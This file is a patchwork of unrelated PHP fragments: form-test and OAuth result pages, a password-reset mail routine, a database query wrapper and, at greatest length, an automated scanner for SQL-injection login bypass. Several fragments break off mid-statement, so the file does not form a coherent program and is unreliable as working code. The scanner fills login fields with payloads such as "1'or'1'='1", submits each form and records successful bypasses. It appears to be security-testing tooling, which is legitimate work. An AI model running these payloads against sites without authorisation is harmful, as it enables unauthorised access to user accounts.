function decode_num_entity($orig_type, $d)
{
    if ($d < 0) {
        $d = 32; // treat control characters as spaces
    }
    if ($d > 127) {
        // switch keeps the loose comparison of the original type check.
        switch ($orig_type) {
            case '%':
                return '%' . dechex($d);
            case '&':
                return "&#{$d};";
        }
    }
    return HtmlSpecialChars(chr($d));
}
$verify = array(); if ($form->WasSubmitted('doit')) { if (($error_message = $form->Validate($verify)) == '') { $doit = 1; } else { $doit = 0; $error_message = HtmlEntities($error_message); } } else { $error_message = ''; $doit = 0; } if (!$doit) { $form->ConnectFormToInput('dependent', 'ONLOAD', 'Focus', array()); } $onload = HtmlSpecialChars($form->PageLoad()); ?> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Test for Manuel Lemos' PHP form class for dependent validation</title> <style type="text/css"><!-- .invalid { border-color: #ff0000; background-color: #ffcccc; } // --></style> </head> <body onload="<?php echo $onload; ?> " bgcolor="#cccccc"> <center><h1>Test for Manuel Lemos' PHP form class for dependent validation</h1></center> <hr />
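/**
 * Renders the OAuth result page — authorization error, token error, or the
 * obtained token — when there is anything to report; otherwise emits nothing.
 *
 * Error text and token values are only shown when `$this->debug` is set. The
 * tokens are credentials, so debug must stay off wherever this page can be
 * reached by anyone but the developer. Every value written into the page,
 * including the expiry, is HTML-escaped.
 *
 * @return void
 */
function Output()
{
    if (!(strlen($this->authorization_error) || strlen($this->access_token_error) || strlen($this->access_token))) {
        return;
    }
    ?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>OAuth client result</title>
</head>
<body>
<h1>OAuth client result</h1>
<?php if (strlen($this->authorization_error)) { ?>
<p>It was not possible to authorize the application.<?php if ($this->debug) { ?>
<br>Authorization error: <?php echo HtmlSpecialChars($this->authorization_error); } ?>
</p>
<?php } elseif (strlen($this->access_token_error)) { ?>
<p>It was not possible to use the application access token. <?php if ($this->debug) { ?>
<br>Error: <?php echo HtmlSpecialChars($this->access_token_error); } ?>
</p>
<?php } elseif (strlen($this->access_token)) { ?>
<p>The application authorization was obtained successfully. <?php if ($this->debug) { ?>
<br>Access token: <?php echo HtmlSpecialChars($this->access_token);
if (isset($this->access_token_secret)) { ?>
<br>Access token secret: <?php echo HtmlSpecialChars($this->access_token_secret); } } ?>
</p>
<?php if (strlen($this->access_token_expiry)) { ?>
<p>Access token expiry: <?php echo HtmlSpecialChars($this->access_token_expiry); ?> UTC</p>
<?php } } ?>
</body>
</html>
<?php
}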
$message .= "<b>Новый пароль</b>: {$newpass}<br/><br/><br/><br/>"; $message .= "<b style='color:green'>С уважением. администрация WWW.MEYDAN.AZ.</b>"; $headers = 'MIME-Version: 1.0' . "\r\n"; $headers .= 'Content-type: text/html; charset=windows-1251' . "\r\n"; $headers .= 'From: WWW.MEYDAN.AZ <*****@*****.**>' . "\r\n"; if (mail($db["email"], $subject, $message, $headers)) { $mess .= "<b style='color:#ff0000'>Внимание! Письмо с паролем будет отправлено на почту указанный в анкете в течении 5 минут.</b><br/>"; } else { $mess .= "<b style='color:#ff0000'>Внимание! Не удалось отправить пароль на e-mail, указанный в анкете!</b><br/>"; } $mess .= 'Новый пароль сохранен.'; } } if ($_POST['dochmail']) { $old_mail = HtmlSpecialChars(addslashes(strtolower(trim($_POST['old_mail'])))); $new_mail = HtmlSpecialChars(addslashes(strtolower(trim($_POST['new_mail'])))); $ok = true; if (trim($new_mail) == '') { $ok = false; $mess = 'Задан пустой почтовый адрес.'; } if (!preg_match('#^[a-z0-9.!\\#$%&\'*+-/=?^_`{|}~]+@([0-9.]+|([^\\s]+\\.+[a-z]{2,6}))$#si', $new_mail)) { $ok = false; $mess = "Ошибка. Неверно введен почтовый адрес."; } if ($old_mail != $db["email"]) { $ok = false; $mess = "Ошибка. Старый почтовый адрес указан неверно."; } if ($ok) { $date = date("d.m.Y H:i");
/**
 * Runs `$sql` on the connection for (`$cluster`, `$shard`), connecting first
 * when no handle is cached in `$GLOBALS['db_conns']`.
 *
 * Each call is timed into `$GLOBALS['timings']` and logged together with the
 * caller trace; when `$GLOBALS['cfg']['db_profiling']` is on, `SHOW PROFILE ALL`
 * is read back and attached under 'profile'. No quoting happens here — the
 * caller must already have escaped any values in `$sql`. Driver errors are
 * suppressed with @ and surfaced through the returned array instead.
 *
 * @param string $sql
 * @param string $cluster
 * @param mixed  $shard
 * @return array 'ok' => 1 plus 'result' on success, or 'ok' => 0 with
 *               'error'/'error_code' on failure; always carries 'sql',
 *               'cluster' and 'shard'
 */
function _db_query($sql, $cluster, $shard)
{
    $cluster_key = _db_cluster_key($cluster, $shard);
    if (!$GLOBALS['db_conns'][$cluster_key]) {
        _db_connect($cluster, $shard);
    }
    $conn = $GLOBALS['db_conns'][$cluster_key];

    $trace = _db_callstack();
    $use_sql = _db_comment_query($sql, $trace);

    $start = microtime_ms();
    $result = @mysql_query($use_sql, $conn);
    $elapsed = microtime_ms() - $start;

    $GLOBALS['timings']['db_queries_count']++;
    $GLOBALS['timings']['db_queries_time'] += $elapsed;
    log_notice('db', "DB-{$cluster_key}: {$sql} ({$trace})", $elapsed);

    #
    # profiling?
    #
    $profile = null;
    if ($GLOBALS['cfg']['db_profiling']) {
        $profile = array();
        $p_result = @mysql_query("SHOW PROFILE ALL", $conn);
        while ($p_row = mysql_fetch_array($p_result, MYSQL_ASSOC)) {
            $profile[] = $p_row;
        }
    }

    #
    # build result
    #
    if ($result) {
        $ret = array('ok' => 1, 'result' => $result, 'sql' => $sql, 'cluster' => $cluster, 'shard' => $shard);
    } else {
        $error_msg = mysql_error($conn);
        $error_code = mysql_errno($conn);
        log_error("DB-{$cluster_key}: {$error_code} " . HtmlSpecialChars($error_msg));
        $ret = array('ok' => 0, 'error' => $error_msg, 'error_code' => $error_code, 'sql' => $sql, 'cluster' => $cluster, 'shard' => $shard);
    }
    // An empty profile (no rows) is dropped, same as when profiling is off.
    if ($profile) {
        $ret['profile'] = $profile;
    }
    return $ret;
}
/**
 * Returns the <script> tag that loads animation.js from `$this->javascript_path`.
 *
 * @param object $form form being rendered (not used by this implementation)
 * @return string one script tag followed by a newline
 */
function ClassPageHead(&$form)
{
    $src = HtmlSpecialChars($this->javascript_path) . 'animation.js';
    return "<script type=\"text/javascript\" src=\"{$src}\"></script>\n";
}
?> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Yahoo OAuth client results</title> </head> <body> <?php echo '<h1>', HtmlSpecialChars($user->query->results->profile->nickname), ' you have logged in successfully with Yahoo!</h1>'; echo '<pre>', HtmlSpecialChars(print_r($user, 1)), '</pre>'; ?> </body> </html> <?php } else { ?> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>OAuth client error</title> </head> <body> <h1>OAuth client error</h1> <p>Error: <?php echo HtmlSpecialChars($client->error); ?> </p> </body> </html> <?php }
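/**
 * Probe every HTML form on $urlToCheck for SQL-injection based authentication bypass.
 *
 * Flow: abort on a 5xx from the page; parse its forms and inputs with file_get_html(); fetch the
 * page three times to learn whether it is static; then, for each form and each payload in
 * $arrayOfPayloads, fill the text/password inputs with the payload, submit the form with its
 * declared method (GET or POST; anything else is skipped) and hand the response to
 * checkIfVulnerabilityFound(). A finding is echoed (for running the script stand-alone) and
 * stored once per (method, url, attack string) in test_results; the remaining payloads for that
 * form are then skipped. Progress goes to logs/eventlogs and updateStatus().
 *
 * @param string $urlToCheck full URL of the page whose forms are tested
 * @param string $urlOfSite  site root that form actions are appended to
 * @param mixed  $testId     id of the running test; interpolated unquoted into the test_results
 *                           lookup, so it is expected to be numeric — presumably validated by the
 *                           caller (TODO confirm)
 * @return void
 */
function testAuthenticationSQLi($urlToCheck, $urlOfSite, $testId) {
    connectToDb($db);
    updateStatus($db, "Testing {$urlToCheck} for Broken Authentication using SQL Injection...", $testId);
    $log = new Logger();
    $log->lfile('logs/eventlogs');
    $log->lwrite("Starting Broken Authentication SQLi test function on {$urlToCheck}");
    $postUrl = $urlToCheck;

    // Check the URL is not responding with 5xx codes before doing any real work.
    $log->lwrite("Checking what response code is received from {$urlToCheck}");
    $http = basqli_new_http_client($testId);
    $error = $http->GetRequestArguments($urlToCheck, $arguments);
    $error = $http->Open($arguments);
    $log->lwrite("URL to be requested is: {$urlToCheck}");
    if ($error == "") {
        $log->lwrite("Sending HTTP request to {$urlToCheck}");
        $error = $http->SendRequest($arguments);
        if ($error == "") {
            $headers = array();
            $error = $http->ReadReplyHeaders($headers);
            if ($error == "") {
                $responseCode = $http->response_status; // This is a string
                $log->lwrite("Received response code: {$responseCode}");
                if (intval($responseCode) >= 500 && intval($responseCode) < 600) {
                    $log->lwrite("Response code: {$responseCode} received from: {$urlToCheck}");
                    // Release the connection on this early exit; the original returned without closing.
                    $http->Close();
                    return;
                }
            }
        }
        $http->Close();
    }
    if (strlen($error)) {
        // Library error text can echo back parts of the user-supplied URL; escape it for HTML.
        echo "<H2 align=\"center\">Error: ", HtmlSpecialChars($error), "</H2>\n";
        $log->lwrite("Error: {$error}");
    }

    $html = file_get_html($postUrl, $testId);
    if (empty($html)) {
        // This can happen due to file_get_contents returning a 500 code. Then the parser won't parse it.
        updateStatus($db, "Problem getting contents from {$urlToCheck}...", $testId);
        $log->lwrite("Problem getting contents from {$urlToCheck}");
        return;
    }

    // Collect every form and every input field; inputs are tied to their form by $formNum,
    // an integer, because forms can share names and ids.
    $arrayOfForms = array();
    $arrayOfInputFields = array();
    $log->lwrite("Searching {$postUrl} for forms");
    $formNum = 1;
    foreach ($html->find('form') as $form) {
        $formId = isset($form->attr['id']) ? htmlspecialchars($form->attr['id']) : '';
        $formName = isset($form->attr['name']) ? htmlspecialchars($form->attr['name']) : '';
        $formMethod = isset($form->attr['method']) ? htmlspecialchars($form->attr['method']) : 'get';
        $formAction = isset($form->attr['action']) ? htmlspecialchars($form->attr['action']) : '';
        $formMethod = strtolower($formMethod);
        if (empty($formAction)) {
            // No action: reuse everything after the site root of the URL the user entered.
            // NOTE(review): strpos() returning false is not handled here (false + 1 == 1),
            // so a URL with no '/' past the site root yields an action starting at offset 1.
            $strLengthUrl = strlen($urlToCheck);
            $strLengthSite = strlen($urlOfSite);
            $firstIndexOfSlash = strpos($urlToCheck, '/', $strLengthSite - 1);
            $formAction = substr($urlToCheck, $firstIndexOfSlash + 1, $strLengthUrl);
        }
        $log->lwrite("Found form on {$postUrl}: {$formId} {$formName} {$formMethod} {$formAction} {$formNum}");
        $arrayOfForms[] = new Form($formId, $formName, $formMethod, $formAction, $formNum);
        foreach ($form->find('input') as $input) {
            $inputId = isset($input->attr['id']) ? htmlspecialchars($input->attr['id']) : '';
            $inputName = isset($input->attr['name']) ? htmlspecialchars($input->attr['name']) : '';
            $inputValue = isset($input->attr['value']) ? htmlspecialchars($input->attr['value']) : '';
            $inputType = isset($input->attr['type']) ? htmlspecialchars($input->attr['type']) : '';
            $log->lwrite("Found input field on {$postUrl}: {$inputId} {$inputName} {$formId} {$formName} {$inputValue} {$inputType} {$formNum}");
            $arrayOfInputFields[] = new InputField($inputId, $inputName, $formId, $formName, $inputValue, $inputType, $formNum);
        }
        $formNum++;
    }

    // Definition of all payloads used. Payloads can be added to this.
    $arrayOfPayloads = array("1'or'1'='1", "1'or'1'='1';#");

    // Check whether the URL shows the same page at different intervals. If it does, a login
    // attempt that yields a different page is taken as the vulnerability being present
    // (a login page looks different when you are and are not logged in).
    $log->lwrite("Checking if {$urlToCheck} displays the same page at different intervals");
    $responseBodies = array();
    $http = basqli_new_http_client($testId);
    for ($a = 0; $a < 3; $a++) {
        $error = $http->GetRequestArguments($urlToCheck, $arguments);
        $error = $http->Open($arguments);
        if ($error == "") {
            $number = $a + 1;
            $log->lwrite("Sending HTTP request number {$number} to {$urlToCheck}");
            $error = $http->SendRequest($arguments);
            if ($error == "") {
                $headers = array();
                $error = $http->ReadReplyHeaders($headers);
                if ($error == "") {
                    $error = $http->ReadWholeReplyBody($body);
                    if (strlen($error) == 0) {
                        $responseBodies[] = $body;
                    }
                }
            }
            $http->Close();
        }
        if (strlen($error)) {
            echo "<H2 align=\"center\">Error: a= {$a} ", HtmlSpecialChars($error), "</H2>\n";
        }
    }
    // Only call the page static when all three fetches succeeded and agree. The original
    // compared missing entries (null == null) and then treated the page as static with an
    // empty reference body, which made every later response look like a "change".
    $pageChanges = true;
    $bodyOfUrl = "";
    if (count($responseBodies) === 3
        && $responseBodies[0] === $responseBodies[1]
        && $responseBodies[1] === $responseBodies[2]) {
        $bodyOfUrl = $responseBodies[0];
        $pageChanges = false;
    }

    $log->lwrite('Beginning testing of forms');
    foreach ($arrayOfForms as $currentForm) {
        $currentFormId = $currentForm->getId();
        $currentFormName = $currentForm->getName();
        $currentFormMethod = $currentForm->getMethod();
        $currentFormAction = $currentForm->getAction();
        $currentFormNum = $currentForm->getFormNum();
        $log->lwrite("Beginning testing of form on {$postUrl}: {$currentFormId} {$currentFormName} {$currentFormMethod} {$currentFormAction}");

        // Inputs belonging to this form, matched on the integer form number.
        $arrayOfCurrentFormsInputs = array();
        foreach ($arrayOfInputFields as $currentInput) {
            if ($currentFormNum == $currentInput->getFormNum()) {
                $arrayOfCurrentFormsInputs[] = $currentInput;
            }
        }

        $log->lwrite("Beginning testing input fields of form on {$postUrl}: {$currentFormId} {$currentFormName} {$currentFormMethod} {$currentFormAction}");
        foreach ($arrayOfPayloads as $currentPayload) {
            echo '<br>Size of current form inputs = ' . sizeof($arrayOfCurrentFormsInputs) . '<br>';
            $arrayOfValues = basqli_fill_form($arrayOfCurrentFormsInputs, $currentPayload, $currentFormAction, $log);
            // Shown to the user as "how the vulnerability was tested for", and also the GET query string.
            $totalTestStr = basqli_build_query_string($arrayOfValues);
            $actionUrl = basqli_action_url($urlOfSite, $currentFormAction);

            if ($currentFormMethod == 'get') {
                $actionUrl .= '?' . $totalTestStr;
                $error = $http->GetRequestArguments($actionUrl, $arguments);
            } elseif ($currentFormMethod == 'post') {
                $error = $http->GetRequestArguments($actionUrl, $arguments);
                $arguments["RequestMethod"] = "POST";
                $arguments["PostValues"] = array();
                foreach ($arrayOfValues as $currentPostValue) {
                    // array_merge is kept deliberately: it renumbers numeric-string field names,
                    // which is the behaviour the original had.
                    $tempArray = array($currentPostValue->getName() => $currentPostValue->getValue());
                    $arguments["PostValues"] = array_merge($arguments["PostValues"], $tempArray);
                }
            } else {
                // Other methods were never submitted by the original either.
                continue;
            }

            $error = $http->Open($arguments);
            $log->lwrite("URL to be requested is: {$actionUrl}");
            if ($error == "") {
                $log->lwrite("Sending HTTP request to {$actionUrl}");
                $error = $http->SendRequest($arguments);
                if ($error == "") {
                    $headers = array();
                    $error = $http->ReadReplyHeaders($headers);
                    if ($error == "") {
                        $error = $http->ReadWholeReplyBody($body);
                        if (strlen($error) == 0) {
                            $http->Close();
                            $vulnerabilityFound = checkIfVulnerabilityFound($urlToCheck, $pageChanges, $bodyOfUrl, $log, $currentPayload, $http);
                            if ($vulnerabilityFound) {
                                basqli_record_finding($db, $log, $testId, $currentFormMethod, $actionUrl, $totalTestStr);
                                // One finding per form is enough; skip the remaining payloads.
                                break;
                            }
                        }
                    }
                }
            }
            if (strlen($error)) {
                echo "<H2 align=\"center\">Error: ", HtmlSpecialChars($error), "</H2>\n";
                echo 'Method: ' . $currentFormMethod . '<br>';
                echo 'Url: ' . HtmlSpecialChars($actionUrl) . '<br>';
            }
        }
    }
}

/**
 * Create the http_class instance used for every request of this test, with the settings the
 * original configured inline twice (no timeouts, an IE6 user agent, up to 5 redirects).
 *
 * @param mixed $testId forwarded to http_class::setTestId()
 * @return http_class
 */
function basqli_new_http_client($testId) {
    $http = new http_class();
    $http->timeout = 0;
    $http->data_timeout = 0;
    //$http->debug=1;
    $http->user_agent = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)";
    $http->follow_redirect = 1;
    $http->redirection_limit = 5;
    $http->setTestId($testId);
    return $http;
}

/**
 * Join a form action onto the site root with exactly one '/' between them.
 *
 * @param string $urlOfSite  site root, with or without a trailing slash
 * @param string $formAction action as parsed from the form (already HTML-escaped by the caller)
 * @return string
 */
function basqli_action_url($urlOfSite, $formAction) {
    // substr() handles an empty $urlOfSite; the original's $urlOfSite[strlen - 1] did not.
    if (substr($urlOfSite, -1) === '/') {
        return $urlOfSite . $formAction;
    }
    return $urlOfSite . '/' . $formAction;
}

/**
 * Build the list of PostOrGetObject values submitted for one form under one payload.
 *
 * text/password inputs receive the payload; checkbox/submit inputs keep their own value; a radio
 * button is added only if no value with that name has been collected yet; reset inputs are
 * skipped, as are hidden inputs and every other type.
 * NOTE(review): because hidden inputs are dropped, forms protected by a hidden CSRF token will
 * probably reject the submission before the login SQL is ever reached — consider passing
 * 'hidden' through like checkbox/submit.
 *
 * @param InputField[] $formInputs inputs belonging to the form
 * @param string       $payload    injection string placed in text/password fields
 * @param string       $formAction form action, for the log line only
 * @param Logger       $log
 * @return PostOrGetObject[]
 */
function basqli_fill_form($formInputs, $payload, $formAction, $log) {
    $values = array();
    foreach ($formInputs as $formInput) {
        $name = $formInput->getName();
        $type = $formInput->getType();
        $value = $formInput->getValue();
        if ($type == 'reset') {
            continue;
        }
        $log->lwrite("Using payload: {$payload}, to all input fields of form w/ action: {$formAction}");
        if ($type == 'text' || $type == 'password') {
            $values[] = new PostOrGetObject($name, $payload);
        } elseif ($type == 'checkbox' || $type == 'submit') {
            $values[] = new PostOrGetObject($name, $value);
        } elseif ($type == 'radio') {
            $nameAlreadyPresent = false;
            foreach ($values as $existing) {
                if ($existing->getName() == $name) {
                    $nameAlreadyPresent = true;
                    break;
                }
            }
            if (!$nameAlreadyPresent) {
                $values[] = new PostOrGetObject($name, $value);
            }
        }
    }
    return $values;
}

/**
 * Serialise the submitted values as name=value pairs joined with '&'.
 *
 * Values are not URL-encoded, matching what the original sent in the GET URL and stored as the
 * attack string.
 *
 * @param PostOrGetObject[] $arrayOfValues
 * @return string empty when there are no values
 */
function basqli_build_query_string($arrayOfValues) {
    $pairs = array();
    foreach ($arrayOfValues as $currentPostValue) {
        $pairs[] = $currentPostValue->getName() . '=' . $currentPostValue->getValue();
    }
    return implode('&', $pairs);
}

/**
 * Echo a finding and store it in test_results unless the same (method, url, attack string)
 * is already recorded for this test.
 *
 * The echoes exist for running the script on its own from a browser. $currentFormMethod is
 * always 'get' or 'post' here, so its interpolation is safe; $actionUrl and $totalTestStr are
 * page-derived and go through addslashes().
 * NOTE(review): $testId is interpolated unquoted and addslashes() is not charset-aware; the $db
 * handle looks mysqli-like (->query(), ->num_rows), so a prepared statement would be the robust
 * form — left as-is because insertTestResult()/updateStatus() receive the same raw $testId.
 *
 * @param mixed  $db                database handle from connectToDb()
 * @param Logger $log
 * @param mixed  $testId
 * @param string $currentFormMethod 'get' or 'post'
 * @param string $actionUrl         URL the form was submitted to (including the query for GET)
 * @param string $totalTestStr      name=value&... string that was submitted
 * @return void
 */
function basqli_record_finding($db, $log, $testId, $currentFormMethod, $actionUrl, $totalTestStr) {
    echo 'Broken Authentication Present!<br>Query: ' . HtmlSpecialChars($totalTestStr) . '<br>';
    echo 'Method: ' . $currentFormMethod . '<br>';
    echo 'Url: ' . HtmlSpecialChars($actionUrl) . '<br>';
    echo 'Error: Successfully Logged In with SQL injection';
    // Check if this vulnerability has already been found and added to DB. If it hasn't, add it to DB.
    $query = "SELECT * FROM test_results WHERE test_id = {$testId} AND type = 'basqli' AND method = '{$currentFormMethod}' AND url = '" . addslashes($actionUrl) . "' AND attack_str = '" . addslashes($totalTestStr) . "'";
    $result = $db->query($query);
    if (!$result) {
        $log->lwrite("Could not execute query {$query}");
        return;
    }
    $log->lwrite("Successfully executed query {$query}");
    $numRows = $result->num_rows;
    if ($numRows == 0) {
        $log->lwrite("Number of rows is {$numRows} for query: {$query}");
        insertTestResult($db, $testId, 'basqli', $currentFormMethod, addslashes($actionUrl), addslashes($totalTestStr));
    }
}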